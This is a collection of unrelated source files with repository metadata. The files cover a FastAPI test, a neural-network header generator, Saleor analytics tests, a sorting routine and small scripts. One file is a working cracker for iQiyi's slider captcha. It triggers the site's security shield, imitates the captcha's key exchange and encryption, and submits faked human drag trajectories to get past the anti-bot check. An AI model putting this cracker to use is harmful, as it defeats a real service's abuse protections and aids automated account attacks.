def __buildtrain(self,propspath): # 创建模型文件
self.trainline = 'java -mx4g -cp "'+self.jarpath+'" '+self.classfier +' -props "'+propspath+'"'
def trainmodel(self,propspath): # 训练模型
self.__buildtrain(propspath)
os.system(self.trainline)
print "save model to model.tagger"
|
[
"n10057862@qut.edu.au"
] |
n10057862@qut.edu.au
|
9f55d5019101be32718fdd9099b71c2cf4b05c1f
|
a7c1022b272636bc09ddbc323597145630d2942a
|
/tests/test_application.py
|
107d0e5c2a825b34d6bb5bf58f8778e643267f13
|
[
"MIT"
] |
permissive
|
gomezjdaniel/sharify-api
|
24e8d44023809a13d52563aaa53c32d2d28c14c9
|
383baa5ae089d996c2d68da8b55e566dd0cfbbf9
|
refs/heads/master
| 2023-05-31T09:50:10.683842
| 2020-01-07T22:20:45
| 2020-01-07T22:20:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 699
|
py
|
from unittest.mock import MagicMock
from app.application import ApplicationFactory
TITLE = 'API'
DESCRIPTION = 'some description'
FACTORY = ApplicationFactory(TITLE, DESCRIPTION)
def create_router():
    """Build a MagicMock router whose `register` method is itself a mock."""
    mock_router = MagicMock()
    mock_router.register = MagicMock()
    return mock_router
def test_whenCreatingApp_thenTitleIsSet():
    """The factory propagates the configured title onto the created app."""
    assert FACTORY.create(debug=True).title == TITLE
def test_whenCreatingApp_thenDescriptionIsSet():
    """The factory propagates the configured description onto the created app."""
    assert FACTORY.create(debug=True).description == DESCRIPTION
def test_whenCreatingApp_thenRoutesAreRegistered():
    """Creating an app registers routes on the injected router exactly once."""
    mock_router = create_router()
    FACTORY.create(debug=True, router=mock_router)
    mock_router.register.assert_called_once()
|
[
"alexandre.frigon.1@gmail.com"
] |
alexandre.frigon.1@gmail.com
|
a95aa94622a80a2031422a715e1dead888f865c7
|
ffcfe0dbee140e4ed15e49c8e7feaac020055f36
|
/Funny_Js_Crack/60-iqiyi/geetest.py
|
324fc575a179e9fab5c52eee648e5b093c777db3
|
[
"MIT"
] |
permissive
|
sumerzhang/Func_Js_Crack
|
d086195a3685fc4612bedeaf950e16c623384cf4
|
8cc8586107fecace4b71d0519cfbc760584171b1
|
refs/heads/master
| 2022-11-11T22:51:27.250686
| 2020-07-01T15:49:01
| 2020-07-01T15:49:01
| 276,882,145
| 22
| 12
|
MIT
| 2020-07-03T11:19:48
| 2020-07-03T11:19:47
| null |
UTF-8
|
Python
| false
| false
| 10,050
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/10/7 10:43
# @Author : Esbiya
# @Email : 18829040039@163.com
# @File : geetest.py
# @Software: PyCharm
import re
import json
import random
import time
import requests
from iqiyi.img_locate import get_distance
from iqiyi.process_trace import get_risk_data
from iqiyi import iqiyi_crypt
class IqiyiSliderCracker:
    """Automates solving the iQiyi slider captcha ("security shield").

    Flow: trigger the slider via a login attempt, perform a key exchange with
    the captcha server, decrypt the puzzle images, measure the gap distance,
    replay a synthetic drag trajectory and submit it for verification.
    """

    def __init__(self, dfp):
        # Random client-side nonces used in the key-exchange handshake.
        self.i = iqiyi_crypt.get_random_str(64)
        self.r = iqiyi_crypt.get_random_str(32)
        # dfp is a device-fingerprint/environment parameter and the key to
        # bypassing the slider; an *expired* dfp is used deliberately so the
        # iQiyi security shield (slider captcha) is triggered.
        self.dfp = dfp
        self.session = requests.session()
        self.session.headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': 'https://www.iqiyi.com',
            'Referer': 'https://www.iqiyi.com/iframe/loginreg?ver=1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36'
        }

    def login(self, env_token=''):
        """Attempt a login to trigger the slider captcha (testing helper).

        The password is the only encrypted field; everything else is fixed.
        :return: the captcha token when a slider is raised, otherwise None.
        """
        url = 'https://passport.iqiyi.com/apis/reglogin/login.action'
        encrypt_pwd = iqiyi_crypt.encrypt_pwd('fheniudhqiu')
        data = {
            'email': iqiyi_crypt.get_random_phone(),
            'fromSDK': '1',
            'sdk_version': '1.0.0',
            'passwd': encrypt_pwd,
            'agenttype': '1',
            '__NEW': '1',
            'checkExist': '1',
            'lang': '',
            'ptid': '01010021010000000000',
            'nr': '1',
            'verifyPhone': '1',
            'area_code': '86',
            'dfp': self.dfp,
            'env_token': env_token,
            # Environment blob ("current environment may be risky"), base64 JSON.
            'envinfo': 'eyJqbiI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS83NS4wLjM3NzAuODAgU2FmYXJpLzUzNy4zNiIsImNtIjoiemgtQ04iLCJndSI6MjQsInVmIjoxLCJqciI6WzEzNjYsNzY4XSwiZGkiOlsxMzY2LDcyOF0sInpwIjotNDgwLCJ1aCI6MSwic2giOjEsImhlIjoxLCJ6byI6MSwicnYiOiJ1bmtub3duIiwibngiOiJXaW4zMiIsIml3IjoidW5rbm93biIsInFtIjpbIkNocm9tZSBQREYgUGx1Z2luOjpQb3J0YWJsZSBEb2N1bWVudCBGb3JtYXQ6OmFwcGxpY2F0aW9uL3gtZ29vZ2xlLWNocm9tZS1wZGZ+cGRmIiwiQ2hyb21lIFBERiBWaWV3ZXI6Ojo6YXBwbGljYXRpb24vcGRmfnBkZiIsIk5hdGl2ZSBDbGllbnQ6Ojo6YXBwbGljYXRpb24veC1uYWNsfixhcHBsaWNhdGlvbi94LXBuYWNsfiJdLCJ3ciI6ImI3NzY2NGM3MTcwNzdhZmZmMzNhN2QyODM2ZTIzNzdjIiwid2ciOiJlZDI2NTg5MTM1MTJlNTA5MmZlMjE5NDAwOGQ3OWEwZSIsImZrIjpmYWxzZSwicmciOmZhbHNlLCJ4eSI6ZmFsc2UsImptIjpmYWxzZSwiYmEiOmZhbHNlLCJ0bSI6WzAsZmFsc2UsZmFsc2VdLCJhdSI6dHJ1ZSwibWkiOiI5YTZlZWMzMS0xODAxLWI5ZGEtMDU3My1jMTVmOGVhMjVlNDEiLCJjbCI6IlBDV0VCIiwic3YiOiIxLjAiLCJqZyI6IjhkYTZmNDY5NmQ4YmU1ODFkMDliNzE3MTkwNTIxMGI5IiwiZmgiOiI0OGZpem1rcnZkejJ3Y2Q2ZzhqMXNybjkiLCJpZm0iOlt0cnVlLDQ2MCw0MjAsImh0dHBzOi8vd3d3LmlxaXlpLmNvbS8iXSwiZXgiOiIiLCJkdiI6Im9mZiIsInB2Ijp0cnVlfQ=='
        }
        result = self.session.post(url, data=data).json()
        # P00223: slider captcha raised; P00159: no slider; otherwise passed.
        if result['code'] == 'P00223':
            print('出现滑块: {}'.format(result))
            return result['data']['data']['token']
        elif result['code'] == 'P00159':
            print('未出现滑块: {}'.format(result))
            return None
        print('滑块验证通过: {}'.format(result))
        return None

    def _init_key(self):
        """Perform the key exchange with the captcha server.

        Sends `i` (plain) and `r` (wrapped in `secure`); the server answers
        with `sr` and `sid`.
        :return: {'sid': ..., 'sr': ...} on success, otherwise None.
        """
        secure = iqiyi_crypt.generate_secure(self.i, self.r)
        # print('secure: {}'.format(secure))
        url = 'https://qcaptcha.iqiyi.com/api/outer/sbox/sbox_init_key'
        data = {
            'secure': secure,
            'platform': 'web',
            'lang': 'zh_cn',
            'langVersion': '6',
            'dfp': 'undefined',
            'authcookie': 'undefined',
            'nifc': 'false'
        }
        result = self.session.post(url, data=data).json()
        if result['code'] == 'A00000':
            print('初始化密钥成功! ')
            # print('密钥初始化数据: {}'.format(result))
            return {
                'sid': result['data']['sid'],
                'sr': result['data']['sr']
            }
        return None

    def format_origin_data(self, token):
        """Build the compact plaintext JSON used to initialize the slider.

        :param token: captcha token returned by login()
        :return: JSON string with all spaces stripped
        """
        return json.dumps({
            't': int(time.time() * 1000),
            'token': token,
            'width': 290,
            'height': 170,
            'clientVersion': 1,
            'dfp': self.dfp,
            'extend': json.dumps({
                "dfp": self.dfp,
                "ptid": "01010021010000000000",
                "agentType": 1,
                "deviceId": "268f8fe0ab5234ce32705696d288397e",
                "areaCode": "86"
            })}).replace(' ', '')

    def _init_slider(self, token, aes_key, hmac_key, sid):
        """Initialize the slider captcha and decrypt its init payload.

        :param token: captcha token
        :param aes_key: AES key agreed during the key exchange
        :param hmac_key: HMAC key agreed during the key exchange
        :param sid: key-session id so the server can pick the right key
        :return: the decrypted `initData` payload
        """
        url = 'https://qcaptcha.iqiyi.com/api/outer/verifycenter/initpage'
        origin_data = self.format_origin_data(token)
        cryptsrc_data = iqiyi_crypt.crypt_srcdata(aes_key, hmac_key, origin_data)
        encrypt_data = {
            'cryptSrcData': cryptsrc_data,
            'cryptVersion': 'web|20180418xkdewxe3dkxu9|' + sid,
            'platform': 'web',
            'nifc': 'false'
        }
        # print('提交表单: {}'.format(encrypt_data))
        resp = self.session.post(url, data=encrypt_data)
        # print('验证码初始化接口返回加密数据: {}'.format(resp.text))
        # Response is "<ciphertext>|..."; AES-decrypt and drop 4 trailing bytes.
        decrypt_data = json.loads(iqiyi_crypt.aes_decrypt(aes_key, resp.text.split('|')[0])[:-4])
        # print('AES 解密后数据: {}'.format(decrypt_data))
        init_data = decrypt_data['data']['initData']
        print('滑块初始化成功! ')
        return init_data

    def format_verify_data(self, token, distance, start_time, ypos):
        """Build the compact JSON form submitted for final verification.

        :param token: captcha token
        :param distance: measured gap distance in pixels
        :param start_time: drag start timestamp (ms)
        :param ypos: vertical offset of the puzzle icon
        :return: JSON string with all spaces stripped
        """
        risk_data = get_risk_data(distance, start_time, ypos)
        # Sleep 0.5-1.5 s to simulate the human drag duration.
        time.sleep(random.uniform(0.5, 1.5))
        return json.dumps({
            "t": int(time.time() * 1000),
            "token": token,
            "staticVerifyValue": distance,
            "riskData": json.dumps(risk_data),
            "clientVersion": 1,
            "platform": "web",
            "dfp": self.dfp
        }).replace(' ', '')

    def _slider_verify(self, post_data, aes_key, hmac_key, sid):
        """Submit the trajectory payload for final verification.

        :param post_data: form payload built by format_verify_data()
        :param aes_key: AES key
        :param hmac_key: HMAC key
        :param sid: key-session id the server uses to pick the decryption key
        :return: decrypted verification result dict
        """
        url = 'https://qcaptcha.iqiyi.com/api/outer/verifycenter/verify'
        data = {
            'cryptSrcData': iqiyi_crypt.crypt_srcdata(aes_key, hmac_key, post_data),
            'cryptVersion': 'web|20180418xkdewxe3dkxu9|' + sid,
            'platform': 'web',
            'noCryptToken': 'undefined',
            'nifc': 'false'
        }
        resp = self.session.post(url, data=data)
        print('接口返回的加密数据: {}'.format(resp.text))
        result = json.loads(re.search('{(.*?)}', iqiyi_crypt.aes_decrypt(aes_key, resp.text.split('|')[0])).group(0))
        print('AES 解密后的数据: {}'.format(result))
        return result

    def crack(self):
        """Run the full cracking flow end to end.

        :return: dict with 'success' (0/1), 'message' and optional 'data'.
        """
        # Trigger the slider via login; requires an unexpired but
        # suspicious-looking dfp parameter.
        token = self.login()
        if not token:
            return {
                'success': 0,
                'message': '该 dfp 参数未存在风险或已过期, 请更换未过期并且可疑的 dfp 参数, 以便触发滑块验证! ',
                'data': None
            }
        # Key exchange: i (plain) and r (encrypted) go out, sr and sid come
        # back. i/r/sr derive the AES and HMAC keys; sid identifies the key
        # session so the server can decrypt the subsequent payloads.
        key_data = self._init_key()
        # Derive the AES key.
        aes_key = iqiyi_crypt.generate_aeskey(self.i, self.r, key_data['sr'])
        # Derive the HMAC key.
        hmac_key = iqiyi_crypt.generate_hmackey(self.i, self.r, key_data['sr'])
        # AES-encrypt with the agreed key and initialize the slider.
        init_data = self._init_slider(token, aes_key, hmac_key, key_data['sid'])
        # Simulate the drag trajectory timing.
        start_time = int(time.time() * 1000)
        # Pause 0.1-0.5 s to mimic human reaction time.
        time.sleep(random.uniform(0.1, 0.5))
        # Restore the shuffled image (js) and locate the gap via cv2 matchTemplate.
        distance = get_distance(init_data)
        # Build the trajectory POST form.
        verify_data = self.format_verify_data(token, distance, start_time, init_data['iconYOffset'])
        # Final verification.
        result = self._slider_verify(verify_data, aes_key, hmac_key, key_data['sid'])
        if result['code'] == "A00000":
            return {
                'success': 1,
                'message': '校验通过! ',
                'data': {
                    'env_token': result['data']
                }
            }
        return {
            'success': 0,
            'message': result['msg'],
            'data': None
        }
# Manual smoke test: run the full crack flow with a hard-coded dfp value.
if __name__ == '__main__':
    x = IqiyiSliderCracker('a10de51d85507d4b159df56da0ae46409210a03221b652d1fc525cc67fb0f65917').crack()
    print(x)
|
[
"184108270@qq.com"
] |
184108270@qq.com
|
a2d4de70557e3e4cd9b206a5a81a6002cbad1b7e
|
3572b2f24e6343869b186f86cfc0c1dbb64f8ed8
|
/scripts/gen_headers.py
|
7aa6e11e1d345cf7bf4598c2ef75e579ab1ad77c
|
[] |
no_license
|
alessandro-montanari/SONIC
|
818656254bf90be8fee29f03dc666d25a161933b
|
868bb1def7e71ec791f44aea4f5d7aef5a0b64a7
|
refs/heads/master
| 2022-11-02T11:45:29.664945
| 2020-06-12T09:45:16
| 2020-06-12T09:45:16
| 271,762,975
| 0
| 0
| null | 2020-06-12T09:42:46
| 2020-06-12T09:42:45
| null |
UTF-8
|
Python
| false
| false
| 5,786
|
py
|
import os
import pickle
import argparse
import numpy as np
import scipy
import int_test
# Directories filled in by main() from the command-line arguments.
param_dir = None
header_dir = None
# Wrap a numeric literal in the C fixed-point macro: 1.5 -> "F_LIT(1.5)".
f_lit = lambda x: 'F_LIT(' + str(x) + ')'
def write_header(name, mats):
    """Emit a C header `<header_dir>/<name>.h` containing the given matrices.

    Each entry of `mats` is (mat_name, mat, layer, sparse). Sparse CONV
    weights are emitted as per-filter compressed (data/offsets/sizes) arrays;
    sparse FC weights as CSR (data/indices/indptr); everything else as a dense
    C array literal.

    NOTE(review): this is Python 2 code — `str(map(f_lit, ...))` relies on
    map() returning a list. It also uses the names `np` and `scipy.sparse`,
    which the visible imports (`import numpy`, `import scipy`) do not bind —
    presumably the real file had `import numpy as np` / `import scipy.sparse`;
    TODO confirm.
    """
    contents = '#ifndef ' + name.upper() + '_H\n'
    contents += '#define ' + name.upper() + '_H\n'
    # Quotes are placeholders; every ' is stripped below before writing.
    contents += '#include \'<libfixed/fixed.h>\'\n'
    contents += '#include \'<libdnn/mem.h>\'\n\n'
    for mat_name, mat, layer, sparse in mats:
        if layer == 'CONV' and sparse:
            # Sparse convolution: flatten each filter and store only non-zero
            # values plus the index deltas between them.
            mat_str = ''
            offsets_str = ''
            sizes_str = ''
            size = 0
            mat = mat.reshape(mat.shape[0], -1)
            for m in mat:
                data = m[m != 0.0].astype(dtype=str)
                idx = np.where(m != 0.0)[0]
                offsets = np.diff(idx).flatten()
                if data.shape[0] > 0:
                    data_size = data.flatten().shape[0]
                    str_mat = str(map(f_lit, data.flatten().tolist()))
                    mat_str += str_mat.replace('[', '').replace(']', '') + ','
                    # First absolute index, then deltas to subsequent indices.
                    str_offsets = str([idx[0]] + offsets.flatten().tolist())
                    offsets_str += str_offsets.replace('[', '').replace(']', '') + ','
                    sizes_str += str(data_size) + ','
                    size += data_size
                else:
                    # All-zero filter: record a zero size, no data/offsets.
                    sizes_str += '0,'
            # Drop each trailing comma.
            mat_str = mat_str[:-1]
            offsets_str = offsets_str[:-1]
            sizes_str = sizes_str[:-1]
            layers = mat.shape[0]
            contents += '#define ' + mat_name.upper() + '_LEN ' + str(size) + '\n\n'
            contents += '__ro_hifram fixed ' + mat_name + \
                '[' + str(size) + '] = {' + mat_str + '};\n\n'
            contents += '__ro_hifram fixed ' + mat_name + '_offsets[' + \
                str(size) + '] = {' + offsets_str + '};\n\n'
            contents += '__ro_hifram fixed ' + mat_name + '_sizes[' + \
                str(layers) + '] = {' + sizes_str + '};\n\n'
        elif layer == 'FC' and sparse:
            # Sparse fully-connected: store in CSR form.
            csr = scipy.sparse.csr_matrix(mat)
            data, indices, indptr = csr.data, csr.indices, csr.indptr
            mat_str = str(map(f_lit, data.flatten().tolist()))
            mat_str = mat_str.replace('[', '{').replace(']', '}')
            indices_str = str(indices.flatten().tolist())
            indices_str = indices_str.replace('[', '{').replace(']', '}')
            indptr_str = str(indptr.flatten().tolist())
            indptr_str = indptr_str.replace('[', '{').replace(']', '}')
            contents += '#define ' + mat_name.upper() + '_LEN ' + \
                str(len(data)) + '\n\n'
            contents += '__ro_hifram fixed ' + mat_name + '[' + \
                str(len(data)) + '] = ' + mat_str + ';\n\n'
            contents += '__ro_hifram uint16_t ' + mat_name + '_offsets[' + \
                str(len(indices)) + '] = ' + indices_str + ';\n\n'
            contents += '__ro_hifram uint16_t ' + mat_name + '_sizes[' + \
                str(len(indptr)) + '] = ' + indptr_str + ';\n\n'
        else:
            # Dense array: emit the full N-dimensional C initializer.
            mat_str = str(map(f_lit, mat.flatten().tolist()))
            mat_str = mat_str.replace('[', '{').replace(']', '}')
            shape_str = ''
            for s in mat.shape:
                shape_str += '[' + str(s) + ']'
            contents += '__ro_hifram fixed ' + mat_name + \
                shape_str + ' = ' + mat_str + ';\n\n'
    # Remove the single quotes that str()-ing the F_LIT strings introduced.
    contents = contents.replace("'", '')
    contents += '#endif'
    path = os.path.join(header_dir, name + '.h')
    with open(path, 'w+') as f:
        f.write(contents)
def weight(name):
    """Load the pickled parameter `<param_dir>/<name>.param`.

    NOTE(review): the file is opened in text mode ('r'), which only works for
    Python 2 / protocol-0 pickles — on Python 3 this would need 'rb'.
    (`global` is unnecessary for a read, kept as-is.)
    """
    global param_dir
    path = os.path.join(param_dir, name + '.param')
    with open(path, 'r') as f:
        return pickle.load(f)
def main(args):
    """Build the graph of weight transforms and emit all network headers.

    Nodes named '*_w*'/'*_m*' are weights/masks loaded from param files; the
    transform helpers (mul, permute, transpose, shuffle, ...) come from the
    project module `int_test` — their exact semantics are not visible here.
    """
    global header_dir, param_dir
    header_dir = args.header_dir
    param_dir = args.param_dir
    graph = int_test.Graph()
    # Input tensor.
    graph.append('input', weight)
    graph.append('input_reshape', int_test.input_reshape, 'input')
    # conv1: separable depthwise (d) / horizontal (h) / vertical (v) filters,
    # each with a pruning mask, plus a bias.
    graph.append('conv1_wd', weight)
    graph.append('conv1_md', weight)
    graph.append('conv1_wh', weight)
    graph.append('conv1_mh', weight)
    graph.append('conv1_wv', weight)
    graph.append('conv1_mv', weight)
    graph.append('conv1_b', weight)
    # Apply mask to weights, then permute into the layout the firmware expects.
    graph.append('conv1_wmd_', int_test.mul, 'conv1_wd', 'conv1_md')
    graph.append('conv1_wmd', int_test.permute, 'conv1_wmd_')
    graph.append('conv1_wmh_', int_test.mul, 'conv1_wh', 'conv1_mh')
    graph.append('conv1_wmh', int_test.permute_vh, 'conv1_wmh_')
    graph.append('conv1_wmv_', int_test.mul, 'conv1_wv', 'conv1_mv')
    graph.append('conv1_wmv', int_test.permute_vh, 'conv1_wmv_')
    # conv2: full filter with mask and bias.
    graph.append('conv2_w', weight)
    graph.append('conv2_m', weight)
    graph.append('conv2_wm_', int_test.mul, 'conv2_w', 'conv2_m')
    graph.append('conv2_wm', int_test.permute, 'conv2_wm_')
    graph.append('conv2_b', weight)
    # fc1: factored (h/v) masked weights plus bias.
    graph.append('fc1_wh', weight)
    graph.append('fc1_mh', weight)
    graph.append('fc1_wv', weight)
    graph.append('fc1_mv', weight)
    graph.append('fc1_b', weight)
    graph.append('fc1_wmh__', int_test.mul, 'fc1_wh', 'fc1_mh')
    graph.append('fc1_wmh_', int_test.transpose, 'fc1_wmh__')
    graph.append('fc1_wmh', int_test.shuffle, 'fc1_wmh_')
    graph.append('fc1_wmv_', int_test.mul, 'fc1_wv', 'fc1_mv')
    graph.append('fc1_wmv', int_test.transpose, 'fc1_wmv_')
    # fc2: dense output layer.
    graph.append('fc2_w', weight)
    graph.append('fc2_wt', int_test.transpose, 'fc2_w')
    graph.append('fc2_b', weight)
    # Evaluate the graph lazily per header and emit one .h file per layer.
    write_header('input', [
        ('input', graph.eval('input_reshape'), 'FC', False)])
    write_header('conv1', [
        ('conv1_wmd', graph.eval('conv1_wmd'), 'CONV', True),
        ('conv1_wmh', graph.eval('conv1_wmh'), 'CONV', True),
        ('conv1_wmv', graph.eval('conv1_wmv'), 'CONV', True),
        ('conv1_b', graph.eval('conv1_b'), 'FC', False)])
    write_header('conv2', [
        ('conv2_wm', graph.eval('conv2_wm'), 'CONV', True),
        ('conv2_b', graph.eval('conv2_b'), 'FC', False)])
    write_header('fc1', [
        ('fc1_wmh', graph.eval('fc1_wmh'), 'FC', True),
        ('fc1_wmv', graph.eval('fc1_wmv'), 'FC', True),
        ('fc1_b', graph.eval('fc1_b'), 'FC', False)])
    write_header('fc2', [
        ('fc2_w', graph.eval('fc2_wt'), 'FC', False),
        ('fc2_b', graph.eval('fc2_b'), 'FC', False)])
# CLI entry point: --param_dir points at the pickled parameters,
# --header_dir receives the generated C headers.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--param_dir',
        type=str,
        help='Parameter directory')
    parser.add_argument(
        '--header_dir',
        type=str,
        help='Header directory')
    args = parser.parse_args()
    main(args)
|
[
"ggobieski@yahoo.com"
] |
ggobieski@yahoo.com
|
784757326adf4e45de7713243d4dd51030312413
|
6437af616b0752b24e1b62bc98d302b2e04a7c85
|
/pagnition/supplier/a1toys.com/pagination.py
|
b7947798a03944b1fa429b9122e992f170ec3c8d
|
[] |
no_license
|
kangqiwang/imageWebCrawler
|
4c7ebc0c93fd52b27f08a0f79302885d95f53a6e
|
76fe21802a5a03638e324e6d18fe5698a69aba70
|
refs/heads/master
| 2022-05-31T00:51:39.649907
| 2019-08-28T15:06:37
| 2019-08-28T15:06:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd
import numpy as np
import requests
def pagnition():
    """Expand each a1toys.com category URL into one URL per result page.

    Reads pagnition/input/a1toys_com.csv ('Category URL', 'Product Count'),
    appends '&p=<page>' for every page and writes the single-column list
    (headed by the literal 'url') to pagnition/output/a1toys_com.csv.
    """
    df = pd.read_csv("pagnition/input/a1toys_com.csv",
                     usecols=['Category URL', 'Product Count'])
    # First element acts as a header row in the output file.
    urls = ['url']
    per_page_count = 20
    for url, count in zip(df['Category URL'], df['Product Count']):
        # NOTE(review): int(count / 20) + 1 emits an extra (empty) page when
        # count is an exact multiple of 20 — kept as-is to preserve output.
        page_num = int(count / per_page_count) + 1
        for page in range(page_num):
            page_url = url + '&p=' + str(page)
            print(page_url)
            urls.append(page_url)
    # (Removed: dead locals urltmp=''/numbertmp=0 and commented-out
    # experiments from another supplier's URL scheme.)
    pd.Series(urls).to_csv("pagnition/output/a1toys_com.csv", index=False)
# Script entry point: generate the paginated URL list on import/run.
pagnition()
|
[
"kang@sourcemogul.com"
] |
kang@sourcemogul.com
|
e7102e8a75f1b70c301e29ea4054d292404bf23c
|
709bd5f2ecc69a340da85f6aed67af4d0603177e
|
/tests/test_analytics.py
|
d6818e163a670b22b8bcf46edc578302d57d81ae
|
[
"BSD-3-Clause"
] |
permissive
|
Kenstogram/opensale
|
41c869ee004d195bd191a1a28bf582cc6fbb3c00
|
5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba
|
refs/heads/master
| 2022-12-15T02:48:48.810025
| 2020-03-10T02:55:10
| 2020-03-10T02:55:10
| 163,656,395
| 8
| 0
|
BSD-3-Clause
| 2022-12-08T01:31:09
| 2018-12-31T09:30:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,647
|
py
|
from decimal import Decimal
from saleor.core.analytics import (
get_order_payloads, get_view_payloads, report_order, report_view)
def test_get_order_payloads(order_with_lines):
    """get_order_payloads yields one transaction payload plus one per line."""
    order = order_with_lines
    payloads = list(get_order_payloads(order))
    # One transaction record followed by one record per order line.
    assert len(payloads) == order.lines.count() + 1
    txn = payloads[0]
    assert txn['ti'] == order.pk
    assert txn['cu'] == order.total.currency
    assert Decimal(txn['tr']) == order.total.gross.amount
    assert Decimal(txn['tt']) == order.total.tax.amount
    assert Decimal(txn['ts']) == order.shipping_price.net.amount
    for index, line in enumerate(order, start=1):
        item_payload = payloads[index]
        assert item_payload['ti'] == order.pk
        assert item_payload['in'] == line.product_name
        assert item_payload['ic'] == line.product_sku
        assert item_payload['iq'] == str(int(line.quantity))
        assert item_payload['cu'] == line.unit_price.currency
        assert Decimal(item_payload['ip']) == line.unit_price.gross.amount
def test_report_order_has_no_errors(order_with_lines):
    # Smoke test: reporting an order with an empty tracking id must not raise.
    report_order('', order_with_lines)
def test_get_view_payloads():
    """get_view_payloads maps path/language/headers onto GA payload fields."""
    request_headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
    payloads = list(get_view_payloads('/test-path/', 'en-us', request_headers))
    payload = payloads[0]
    assert payload['dp'] == '/test-path/'
    assert payload['dh'] == 'getsaleor.com'
    assert payload['dr'] == 'example.com'
    assert payload['ul'] == 'en-us'
def test_report_view_has_no_errors():
    # Smoke test: reporting a page view with an empty tracking id must not raise.
    headers = {'HTTP_HOST': 'getsaleor.com', 'HTTP_REFERER': 'example.com'}
    report_view('', '/test-path/', 'en-us', headers)
|
[
"Kenstogram@gmail.com"
] |
Kenstogram@gmail.com
|
5129f315bcfc269da60e35fe27be4f23c66a4b73
|
e80b42fbc5f109f3979537a980eb4ea12668579e
|
/anagram/anagram1.py
|
c1dea94a1aa3c2e88e750d66c2a74340d3cfbb68
|
[] |
no_license
|
iliefa/pythontries
|
63bc38042797a47407a0e99a0c20816a8710027b
|
7ee793c6a248bc98da495d5936290c476bf4d77c
|
refs/heads/master
| 2020-11-25T11:13:46.212549
| 2019-12-18T11:56:08
| 2019-12-18T11:56:08
| 228,633,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
# Check whether a fixed sample list is already in ascending order and report.
test_list = [10, 4, 5, 8, 11]
print("original list" + str(test_list))
# Compare against a sorted copy instead of sorting in place with a flag.
if test_list == sorted(test_list):
    print("list is sorted")
else:
    print("list is not sorted")
|
[
"andrei.ilief@orange.com"
] |
andrei.ilief@orange.com
|
030b9637a9a4ea51407b961085ffa343a2134707
|
52d000f6dddcc3cf22f7418a6d116d713e8e7d13
|
/count_sort.py
|
b1ba373fbc583cb28dcd390db53a1f2425c3253b
|
[] |
no_license
|
TianyiY/Sort_Algorithms
|
8317e8f71b0ae2ca3692977e9d4ebe82aaecb28d
|
a21ced94b05d8d808cf51d2d6bab158a5b3fbf13
|
refs/heads/master
| 2021-01-19T07:12:58.901291
| 2019-01-25T01:44:25
| 2019-01-25T01:44:25
| 95,682,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
def count_sort(list):
    """Counting sort for a list of integers; sorts in place and returns it.

    Runs in O(n + k) where k = max - min. The parameter name `list` shadows
    the builtin but is kept for interface compatibility.
    """
    # Robustness fix: the original crashed on an empty list (min stayed at
    # numpy.inf, giving a non-integer count array size).
    if not list:
        return list
    # Built-in min/max replace the manual scan and the local numpy import.
    minimum = min(list)
    maximum = max(list)
    # One counter slot per distinct value in [minimum, maximum].
    count_list = [0] * (maximum - minimum + 1)
    for value in list:
        count_list[value - minimum] += 1
    # Write each value back count_list[i] times, in ascending order.
    index = 0
    for i in range(maximum - minimum + 1):
        for j in range(count_list[i]):
            list[index] = i + minimum
            index += 1
    return list
# Smoke test (Python 2 print statement): sort a sample list and show it.
print count_sort([49, 38, 65, 97, 76, 13, 27, 49, 78, 34, 12, 64, 5, 4, 62, 99, 98, 54, 56, 17, 18, 23, 34, 15, 35, 25, 53, 51, 111, 123, 234, 321, 245, 543, 126, 160, 156, 451, 156])
|
[
"noreply@github.com"
] |
noreply@github.com
|
987a83e80e30dcd1ceb4d43b399649ee7698b706
|
c81ae49611329f79992054fd0c4a3a1df12cc6a1
|
/ml-library/main.py
|
8418089057aa1ff73029c72d0801fd8ddde18cf4
|
[] |
no_license
|
ce-itcr/CE5508-laboratorio-git
|
954e4fcba5a529bcb433c008f80ff3b29ebcf241
|
e4bbafe254c015cbaf4f4c741e9874e9561308fa
|
refs/heads/main
| 2023-07-12T07:52:47.095162
| 2021-08-19T04:17:26
| 2021-08-19T04:17:26
| 397,759,614
| 0
| 0
| null | 2021-08-19T04:17:27
| 2021-08-18T23:26:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 55
|
py
|
# Demo entry point used to exercise the git-hooks lab exercise.
print('Hello World!')
print('PT001 - Test with hooks')
|
[
"angelo2898@gmail.com"
] |
angelo2898@gmail.com
|
b55643fcff23f3cfd287575893b92be9ceb28574
|
017493ea878a39b877c7f6801af98caa1e3feb97
|
/Python/09 - Errors and Exceptions/Incorrect Regex.py
|
4482874ad187786d9c69f145bc3f65df2d8d57c0
|
[
"MIT"
] |
permissive
|
BHAVJOT14/HackerRank-Solutions
|
569b15738b7baed987bf4719e8f89239faed191e
|
8fe0280f5ce150a28598be71dc7ab6f06318e4d5
|
refs/heads/main
| 2023-07-16T09:52:48.955592
| 2021-09-07T16:00:22
| 2021-09-07T16:00:22
| 394,179,235
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
import re

# HackerRank "Incorrect Regex": for each of N input lines, print True if
# the line compiles as a valid regular expression, False otherwise.
for _ in range(int(input())):
    try:
        re.compile(input())
    except re.error:
        # re.compile raises re.error for an invalid pattern; catching only
        # that (instead of all Exceptions) avoids hiding unrelated bugs.
        print("False")
    else:
        print("True")
|
[
"68502679+bhavi140201@users.noreply.github.com"
] |
68502679+bhavi140201@users.noreply.github.com
|
87c3f5e9e98139684c31bf71c78d561487e8ea87
|
51ddc39b5427404836547612c7bed86ab6b1ba67
|
/courses/views.py
|
